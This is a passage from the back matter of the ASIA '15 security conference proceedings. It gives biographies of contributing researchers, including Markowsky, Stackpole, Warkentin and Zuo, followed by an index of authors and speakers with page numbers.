the Ternopil National Economic University. He has numerous publications and grants and is

currently focusing on Cybersecurity, and is the Director of UMaine's Cybersecurity Lab. He also

holds a patent in the area of Universal Hashing. His interests range from pure mathematics to the

application of mathematics and computer science to biological problems. George Markowsky

was the founding President of the Maine Software Developers Association (MeSDA) from its

inception in spring 1993 until May 1998. Dr. Markowsky founded a software company, Trefoil

Corporation in February 1994. Trefoil Corporation developed the O*NET software for the U. S.

Department of Labor that replaced the Dictionary of Occupational Titles. The O*NET software

was released nationally in 1998.

Leigh A. Mutchler is a Lecturer of Information Management at the University of Tennessee,

Knoxville. She received her Ph.D. in MIS from Mississippi State University. Her research

interests are primarily in the area of behavioral information security and her work has appeared

in the Communications of the AIS, a book chapter, and conference proceedings including the

Americas Conference on Information Systems, the Dewald Roode Workshop on Information

Systems Security Research, and the National Decision Sciences Institute Annual Conference.

Tae H. Oh received a B.S. degree in Electrical Engineering from Texas Tech University in 1990

and M.S. and Ph.D. degrees in Electrical Engineering from Southern Methodist University

(SMU) in 1995 and 2001, respectively. He is Associate Professor of Information Sciences and

Technology Department at Rochester Institute of Technology (RIT). His research focus has been

in mobile computing, mobile device security, mobile ad hoc networks, and cyber security. He

has over 20 years of experience in networking and telecommunication as an engineer and

researcher for several telecom and defense companies before he joined RIT.

Andrew Pulver is a PhD student at the University at Albany, SUNY. His current areas of

interest include computer vision and deep learning.

Nick Roberts is an undergraduate student in the Department of Information Security and

Forensics at Rochester Institute of Technology.

Neetesh Saxena received his B.Tech. in computer science & engineering and M.Tech. in

information technology degrees, both in honors, from UP Technical University, Lucknow, and

Guru Gobind Singh Indraprastha University, Delhi, India respectively. He completed his Ph.D.

in computer science & engineering from Indian Institute of Technology, Indore, India. He is

currently a postdoctoral researcher at Department of Computer Science, State University of New

York (SUNY) Korea, South Korea, and a visiting researcher at Department of Computer

Science, Stony Brook University, USA. His current research interests include smart grid security,

cryptography, security in cellular network, and secure mobile applications. He is a member of

several professional bodies including IEEE, ACM, and CSI.

Bill Stackpole has been teaching at the Rochester Institute of Technology since 2001 in the areas

of network and system security and computer forensics. Professor Stackpole served as an officer

for the IEEE 1910 working group which is developing a secure alternative to replace current

implementations of the Spanning Tree algorithm. He has been involved in a variety of security

competitions since 2004. Bill has been in the Northeast Regional Collegiate Cyber Defense

Competition since its inception in 2008, serving both on the Red team and as the blue team coach

for the RIT student competitors. He also coaches for the National Cyber League and other

security events. Current research interests include: network security, IDPS tuning, netflow hop

analysis, etc. Bill has written numerous papers covering various aspects of the security field and

ASIA '15 78

is currently developing a tiered, collegiate Penetration Testing competition to be hosted at RIT in

the fall of 2015.

Jared Stroud is a graduate student at the Rochester Institute of Technology where he is pursuing

a Master’s degree in Computing Security. Jared primarily focuses on application security, and

offensive tool development.

Boleslaw K. Szymanski is the Claire and Roland Schmitt Distinguished Professor and the

Director of the Network Science and Technology Center at Rensselaer Polytechnic Institute. He

published over 300 scientific articles, is a foreign member of the National Academy of Science

in Poland and an IEEE Fellow and was a National Lecturer for the ACM. In 2009, he received

the Wilkes Medal of British Computer Society. His current research interests focus on network

science, network resilience and technology-based social networks.

Matthew Tentilucci completed his undergraduate studies at Rochester Institute of Technology,

where he graduated cum laude with a double major in Computer Security, and Applied

Networking and Systems Administration. He then continued his academic career at The

Pennsylvania State University where he earned an M.S. in Information Sciences and

Technology. For his master’s thesis, Matthew explored methods to securely acquire digital

evidence from VMware ESXi hypervisiors. Matthew is currently living in Maryland with wife,

Sarah, and their dog and cat, Rocco and Luna. He currently works for the United States

Government.

Merrill Warkentin is a Professor of MIS and the Drew Allen Endowed Fellow in the College of

Business at Mississippi State University. His research, primarily on the impacts of

organizational, contextual, situational, and dispositional factors on individual user behaviors in

the context of information security and privacy, addresses security policy compliance/violation

and social media use, and has appeared in MIS Quarterly, Decision Sciences, European Journal

of Information Systems, Decision Support Systems, Computers & Security, Information Systems

Journal, Communications of the ACM, Communications of the AIS, Journal of Information

Systems, and others. He is the author or editor of several books on technology, including a 2015

book on Data Analytics. He is the AIS Departmental Editor for IS Security & Privacy, the Chair

of the UN-sponsored IFIP Working Group on IS Security Research, an Associate Editor for MIS

Quarterly and Information & Management, an SE for AIS Transactions on Replication Research,

and the Eminent Area Editor (MIS) for Decision Sciences. He has chaired several international

conferences, has chaired security/privacy tracks at ICIS, AMCIS, ECIS, and DSI, and will be the

2016 AMCIS Program Co-Chair. His work has been funded by NSF, IBM, NSA, DoD,

Homeland Security, and others. Dr. Warkentin served as a Distinguished Lecturer for the

Association for Computing Machinery (ACM).

Abukari Mohammed Yakubu received the B.S degree in computer engineering from Kwame

Nkrumah University of Science and Technology, Kumasi, Ghana in 2007. From June 2008 to

October 2008, he worked as a software engineer for SISCO Information Systems, Accra, Ghana.

He also worked at Mobile Telecommunications Network (MTN), Accra, Ghana, from 2008 to

2013, as a VAS engineer involved in the integration and deployment of telecommunication value

added services. Since 2013, he has been a research assistant at the Department of Applied

Computer Science, University of Winnipeg, MB, Canada. His research interest is in multimedia

security and privacy focusing on audio/speech.

Yanjun Zuo is a professor of information systems at the University of North Dakota, Grand

Forks, ND, USA. He received a PhD degree from the University of Arkansas, Fayetteville,

USA. His research interests include trustworthy computing, database systems, and information

ASIA '15 79

security. He has published numerous articles in refereed journals and conference proceedings

including Decision Support Systems, IEEE Transactions on Secure and Dependable Computing,

IEEE Transactions on Systems, Man and Cybernetics, Journal of Information management and

Computer Security, Information Systems Frontiers, International Conference on Information

Systems (ICIS), and Hawaii International Conference on Systems Science (HICCS).

ASIA '15 80

INDEX OF AUTHORS / SPEAKERS

Atrey, Pradeep K. pp. 39-43

Babbitt, Thomas pp. 51-56

Barry, Charles p. 32

Bogaard, Dan pp. 19-23

Califano, Anthony pp. 44-50

Campillo, Reiner pp. 60-66

Chang, Ming-Ching pp. 34-37

Chaturvedi, Manmohan pp. 28-31

Chaudhari, Narendra S. pp. 67-72

Dincelli, Ersin pp. 44-50

Goel, Sanjay pp. 32, 38, 44-50

Gupta, Srishti pp. 28-31

Harmat, Bryan pp. 24-27

Hart, Delbert pp. 7-13

Hartley, John G. p. 38

Herath, Hemantha p. 18

Herath, Tejaswini p. 18

Hong, Yuan p. 38

Johnson, Daryl pp. 19-23, 24-27

Kandari, Shreshth pp. 19-23

Kisekka, Victoria pp. 57-59

Lute, Jane Holl p. 1

Lyu, Siwei pp. 34-37

Maddage, Namunu C. pp. 39-43

Markowsky, George pp. 19-23

McConnell, Bruce p. 33

Mutchler, Leigh A. pp. 2-6

Oh, Tae pp. 60-66

Pulver, Andrew pp. 34-37

Roberts, Nick pp. 19-23

Saxena, Neetesh pp. 67-72

Stackpole, Bill pp. 19-23

Stroud, Jared pp. 24-27

Szymanski, Boleslaw pp. 51-56

Tentilucci, Matt pp. 19-23

Warkentin, Merrill pp. 2-6

Yakubu, Abukari M. pp. 39-43

Zuo, Yanjun pp. 14-17

ASIA '15 81